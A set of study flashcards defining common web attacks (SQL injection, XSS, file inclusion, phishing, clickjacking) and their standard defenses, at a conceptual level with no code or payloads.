Web Security - Injections and Attacks Flashcards
Types of Injection Attacks
Web Security
- Command Injection Attacks
- File Inclusion Attacks
- HTML Injections
- SQL Injections
- Cross-Site Scripting/XSS Attacks
Define
Command Injection Attacks
Web Security
When an attacker injects malicious code into the shell
Define
File Inclusion Attack
Web Security
When an application is tricked into running or exposing files on the server with PHP
Define
HTML Injection Attack
Web Security
Using tags to modify an HTML application
Define
SQL Injection
Web Security
Manipulating SQL queries to select, insert, update, and delete info/data
Defenses against Injection Attacks
Web Security
- Sanitization of user input to remove meta-characters and default allow
- Use PHP sanitization to clean/validate input data
Defenses against SQL Injections
Web Security
- Prohibit user-supplied data to modify
- Store procedures/isolate app from SQL operations
- Prepare statements for clear separation of data and code
Define
Cross-Site Scripting/XSS Attacks
Web Security
Injected malicious executable scripts using script tag
What are the two types of XSS attacks?
Web Security
Stored and reflected
Define
Stored XSS Attack
Web Security
Permanently stored injected code on a server
Define
Reflected XSS Attack
Web Security
Injected code reflected off victim’s server that is controlled by the attacker and activated through victim clicking the link
Defenses against XSS Attacks
Web Security
Sanitize all data and input to prevent new code and characters through output escaping and content security policy
Define
Output Escaping
Web Security
Sepcial characters are replabledwith character entities to prevent user input from having characters that build HTML elements
Define
Content Security Policy
Web Security
Allows server to specifiy what is or isn’t allowed during page rendering with the help of the browser
Types of UI Attacks
Web Security
- Phishing Attacks
- Manipulating URLS
- Clickjacking
- Click Interception
Describe
Phishing Attacks
Web Security
Mimicking legit sites to lure users and reveal sensitive data
Defenses against Phishing Attacks
Web Security
- Search engine removes and filters out sites
- User checks the site they’re on or before clicking
Ways to manipulate URLs
Web Security
URL Obfuscation/Types and Internationalized Domain Name Homograph Attacks
Define
URL Obfuscation/Types
Web Security
Choosing similar looking URLs
Provide an example of URL Obfuscation/Types
Web Security
google.com versus gooogle.com
Define
Internationalized Domain Name Homograph Attack
Web Security
Obscuring the URL such that a character is in a different font or looks different
Define
Clickjacking/UI Redressing
Web Security
Luring the user to click on an element not associated with the main frame (uses overlapping transparent iframes)
What does clickjacking bypass?
Web Security
SOP
What does clickjacking compromise?
Web Security
Context Integrity
Define
Context Integrity
Web Security
Visual + Temporal Integrity
Describe
Visual Integrity
Web Security
The target and pointer are visible and accounted for
Describe
Temporal Integrity
Web Security
If the target is clicked, then the target is checked.
If the pointer is clicked, then the pointer is checked.
Defenses against clickjacking
Web Security
- User confirmation before taking sensitive actions
- UI randomization - sensitive information is placed randomly
- Framebusting
- X-Frame Options - browser can/can’t render
Limitations with clickjacking defenses
Web Security
- Degrades user experience
- May be unreliable or easily defeated
Define
Click Interception
Web Security
Forcing a user to visit a URL by taking over their pointer
